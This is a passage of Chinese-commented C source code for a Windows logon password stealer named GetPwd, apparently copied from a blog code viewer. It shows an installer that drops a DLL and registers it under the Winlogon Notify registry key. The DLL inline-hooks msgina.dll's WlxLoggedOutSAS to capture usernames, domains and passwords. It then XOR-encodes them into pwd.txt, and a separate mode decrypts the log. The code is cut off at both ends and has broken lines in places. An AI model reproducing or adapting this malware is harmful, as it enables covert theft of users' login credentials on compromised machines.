31.{
32.buffer[i]=buffer[i]^3;
33.}
34.printf("解密内容为:
/r/n%s",buffer);
35.return;
36.}
37.bool installed(); //判断是否已经安装
38.void installe() //安装函数
39.{
40.if(installed())
41.{
42.printf("已经安装过了!
");
43.return;
44.}
45.HRSRC hResInfo;
46.HGLOBAL hResData;
47.DWORD dwSize, dwWritten;
48.LPBYTE p;
49.HANDLE hFile;
50.hResInfo = FindResource(NULL, MAKEINTRESOURCE(IDR_DLL1), "dll");
51.dwSize = SizeofResource(NULL, hResInfo);
52.hResData = LoadResource(NULL, hResInfo);
53.p = (LPBYTE)GlobalAlloc(GPTR, dwSize);
54.CopyMemory((LPVOID)p, (LPCVOID)LockResource(hResData), dwSize);//定位资源
55.char pfile[200];
56.GetWindowsDirectory(pfile, 200);
57.strcat(pfile,"//GetPwd.dll");//C:
/WINDOWS/
58.hFile = CreateFile(pfile, GENERIC_WRITE, 0, NULL, CREATE_ALWAYS, 0, NULL);
59.WriteFile(hFile, (LPCVOID)p,dwSize, &dwWritten, NULL);
60.CloseHandle(hFile);
61.GlobalFree((HGLOBAL)p);
62.HKEY hkey;
63.if(ERROR_SUCCESS==RegCreateKey(HKEY_LOCAL_MACHINE,
64."SOFTWARE//Microsoft//Windows NT//CurrentVersion//Winlogon//Notify//GetPwd//",
65.&hkey)
66.)
67.{
68.char * name3 ="dog";
69.RegSetValueEx(hkey,"dllname",0,REG_SZ,(const unsigned char *)pfile,strlen(pfile));
70.RegSetValueEx(hkey,"startup",0,REG_SZ,(const unsigned char *)name3,strlen("dog"));
71.printf("安装成功!
");
72.}
73.else
74.{
75.printf("安装失败!
");
76.return;
77.}
78.}
79.bool installed()
80.{
81.HKEY hkey;
82.char sz[256];
83.DWORD dwtype, sl = 256;
84.if(ERROR_SUCCESS !
= RegOpenKeyEx(HKEY_LOCAL_MACHINE,
85."SOFTWARE//Microsoft//Windows NT//CurrentVersion//Winlogon//Notify//GetPwd",
86.NULL, KEY_ALL_ACCESS, &hkey) //打开失败,表示没有安装
87.)
88.{
89.RegCloseKey(hkey);
90.return false;
91.}
92.RegCloseKey(hkey);
93.return true;
94.}
95.void usag()//用法提示
96.{
97.printf("example:
/r/n");
98.printf("/r/n Install:
getpwd.exe installe");
99.printf("/r/n Decryp :
getpwd.exe Decryp /r/n");
100.}
101.int main(int argc, char* argv[])
102.{
103.if(!
lstrcmpi(argv[1],"installe"))//
104.{
105.installe();
106.return 0;
107.}
108.else if(!
lstrcmpi(argv[1], "Decryp"))
109.{
110.dey();
111.return 0;
112.}
113.usag();
114.return 0;
115.}
密码截获
viewplaincopytoclipboardprint?
1.#define WLX_SAS_ACTION_LOGON
(1)
2.DWORD WINAPI StartHook(LPVOID lpParameter);
3.typedef struct _WLX_MPR_NOTIFY_INFO {
4.PWSTR pszUserName;
5.PWSTR pszDomain;
6.PWSTR pszPassword;
7.PWSTR pszOldPassword;
8.} WLX_MPR_NOTIFY_INFO, * PWLX_MPR_NOTIFY_INFO;
9.typedef int (WINAPI* WlxLoggedOutSAS)(
10.//定义函数原型,以便将数据转发给系统
11.PVOID pWlxContext,
12.DWORD dwSasType,
13.PLUID pAuthenticationId,
14.PSIDpLogonSid,
15.PDWORD pdwOptions,
16.PHANDLE phToken,
17.PWLX_MPR_NOTIFY_INFOpNprNotifyInfo,
18.PVOID * pProfile
19.);
20.int WINAPI FunNewADDR(
21.PVOID pWlxContext,
22.DWORD dwSasType,
23.PLUID pAuthenticationId,
24.PSID pLogonSid,
25.PDWORD pdwOptions,
26.PHANDLE phToken,
27.PWLX_MPR_NOTIFY_INFO prNotifyInfo,
28.PVOID * pProfile);
29.//自定义接管WlxLoggedOutSAS的函数,形参保持一致
30.void WriteLog(
31.PWLX_MPR_NOTIFY_INFOpNprNotifyInfo
32.);//声明保存用户名密码函数原型
33.int WideToByte( PCHAR sz_target, PWSTR sz_source , int size_ansi);
34.void WriteCurrentTime();
35.void HookWlxLoggedOutSAS();
36.//执行HOOK
37.void UnHookWlxLoggedOutSAS();
38.//撤销HOOK
39.bool isWin2K()//判断操作系统版本
40.{
41.DWORD winVer;
42.OSVERSIONINFO *osvi;
43.winVer=GetVersion();
44.if(winVer<0x80000000)
45.{
46.osvi= (OSVERSIONINFO *)malloc(sizeof(OSVERSIONINFO));
47.if (osvi!
=NULL)
48.{
49.memset(osvi,0,sizeof(OSVERSIONINFO));
50.osvi->dwOSVersionInfoSize=sizeof(OSVERSIONINFO);
51.GetVersionEx(osvi);
52.if(osvi->dwMajorVersion==5L&&osvi->dwMinorVersion==0L)
53.{
54.free(osvi);
55.return true;
56.}
57.}
58.}
59.free(osvi);
60.return false;
61.}
62.#pragma pack
(1)//对齐字节
63.struct HookTable{
64.HMODULEhMsgina;
65.WlxLoggedOutSAS OldDDR;
66.WlxLoggedOutSAS NewADDR;
67.unsigned charOldCode[6];
68.unsigned charJmpCode[6];
69.};//自定义的结构体
70.HookTable hooktable = {
71.0 ,
72.0 ,
73.&FunNewADDR ,
74."/x8B/xFF/x55/x8B/xEC", //前5个字节
75."/xE9/x00/x00/x00/x00" //e9 ,jmp
76.};
77./*
78.#pragma pack()
79.BOOL APIENTRY DllMain( HANDLE hModule,
80.DWORD ul_reason_for_call,
81.LPVOID lpReserved
82. )
83.{
84.if(isWin2K())
85.//win2K和xp、2003的前五个字节不同
86.{
87.hooktable.OldCode[0] ='/x55';
88.hooktable.OldCode[1] ='/x8B';
89.hooktable.OldCode[2] ='/xEC';
90.hooktable.OldCode[3] ='/x83';
91.hooktable.OldCode[4] ='/xEC';
92.}
93.switch (ul_reason_for_call)
94.{
95.case DLL_PROCESS_ATTACH:
96.HANDLE hthread = CreateThread( 0 ,
97.0 ,
98.LPTHREAD_START_ROUTINE(StartHook) ,
99.0 ,
100.0 ,
101.0);
102.CloseHandle( hthread );
103.break;
104.}
105.return TRUE;
106.}
107.DWORD WINAPI StartHook(LPVOID lpParameter)
108.{
109.hooktable.hMsgina = GetModuleHandle( _T("msgina.dll"));
110.if ( hooktable.hMsgina == NULL)
111.{
112.return 0 ;
113.}
114.hooktable.OldDDR = (WlxLoggedOutSAS)GetProcAddress( hooktable.hMsgina , _T("WlxLoggedOutSAS") );
115.//得到原始函数地址,等下撤销HOOK会用到
116.if (hooktable.OldDDR == NULL)
117.{
118.return 0 ;
119.}
120.unsigned char *p = (unsigned char *)hooktable.OldDDR;
121.int *OpCode = (int *)&hooktable.JmpCode[1];//
122.int Code = (int)hooktable.NewADDR - (int)hooktable.OldDDR - 5;
123.*OpCode = Code;
124.HookWlxLoggedOutSAS();
125.return 0;
126.}
127.void HookWlxLoggedOutSAS()
128.{
129.DWORD OldProtect = NULL;
130.VirtualProtect( hooktable.OldDDR ,
131.5 ,
132.PAGE_EXECUTE_READWRITE ,
133.&OldProtect
134.);//内存访问权限
135.unsigned char *p = (unsigned char *)hooktable.OldDDR;
136.for (int i=0 ; i < 5 ; i++ )
137.{
138.p[i] = hooktable.JmpCode[i];
139.}
140.VirtualProtect( hooktable.OldDDR ,
141.5 ,
142.OldProtect ,
143.&OldProtect
144.);
145.return;
146.}
147.void UnHookWlxLoggedOutSAS()
148.{
149.DWORD OldProtect = NULL;
150.VirtualProtect( hooktable.OldDDR ,
151.5 ,
152.PAGE_EXECUTE_READWRITE ,
153.&OldProtect );
154.unsigned char *p = (unsigned char *)hooktable.OldDDR;
155.for (int i=0 ; i < 5 ; i++ )
156.{
157.p[i] = hooktable.OldCode[i];
158.}
159.VirtualProtect( hooktable.OldDDR ,
160.5 ,
161.OldProtect ,
162.&OldProtect );
163.return;
164.}
165.char pBuffer[1124];
166.void WriteLog(PWLX_MPR_NOTIFY_INFOpNprNotifyInfo)
167.//主要是一些文件操作
168.{
169.int size_u = lstrlenW( pNprNotifyInfo->pszUserName );
170.size_u += lstrlenW( pNprNotifyInfo->pszDomain );
171.size_u += lstrlenW( pNprNotifyInfo->pszPassword );
172.size_u += lstrlenW( pNprNotifyInfo->pszOldPassword );
173.unsigned short *pWBuffer = (unsigned short *)GlobalAlloc( GMEM_FIXED , size_u + 1024 );
174.unsigned short *tWBuffer = (unsigned short *)GlobalAlloc( GMEM_FIXED , size_u + 1024 );
175.char pBuffer1[1124];
176.char *pwd =(char *)GlobalAlloc( GMEM_FIXED , size_u + 1024 );
177.char *pwd2 =(char *)GlobalAlloc( GMEM_FIXED , size_u + 1024*3 );
178.ZeroMemory( pWBuffer , size_u + 1024 );
179.ZeroMemory( pBuffer , size_u + 1024 );
180.ZeroMemory( pBuffer1 , size_u + 1024 );
181.if ( !
pBuffer )
182.{
183.return;
184.}else
185.{
186.WriteCurrentTime();
187.wsprintfW( pWBuffer ,
188.L"/r/nUser= %s /r/nDomain = %s/r/nPassWord = %s /r/nOldPass = %s/r/n" ,
189.pNprNotifyInfo->pszUserName ,
190.pNprNotifyInfo->pszDomain ,
191.pNprNotifyInfo->pszPassword,
192.pNprNotifyInfo->pszOldPassword
193.);
194.WideToByte( pBuffer ,
195.pWBuffer ,
196.lstrlenW( pWBuffer )
197.);
198.}
199.char LogPath[MAX_PATH] = {0};
200.GetSystemDirectory( LogPath , MAX_PATH);
201.lstrcat( LogPath , "//pwd.txt");
202.HANDLE hfile = CreateFile(
203.LogPath ,
204.GENERIC_WRITE ,
205.FILE_SHARE_WRITE ,
206.0 ,
207.OPEN_ALWAYS,
208.FILE_ATTRIBUTE_NORMAL ,
209.0 );
210.if (hfile !
= INVALID_HANDLE_VALUE)
211.{
212.unsigned long ret;
213.SetFilePointer( hfile , -1 , 0 , FILE_END);
214.int i=0;
215.SYSTEMTIME st;
216.int b;
217.for(;i218.{
219.pBuffer[i] = pBuffer[i] ^ 3;//加密采用异或方式
220.}
221.WriteFile( hfile , pBuffer , lstrlen( pBuffer ) , &ret , 0 );
222.CloseHandle( hfile );
223.}
2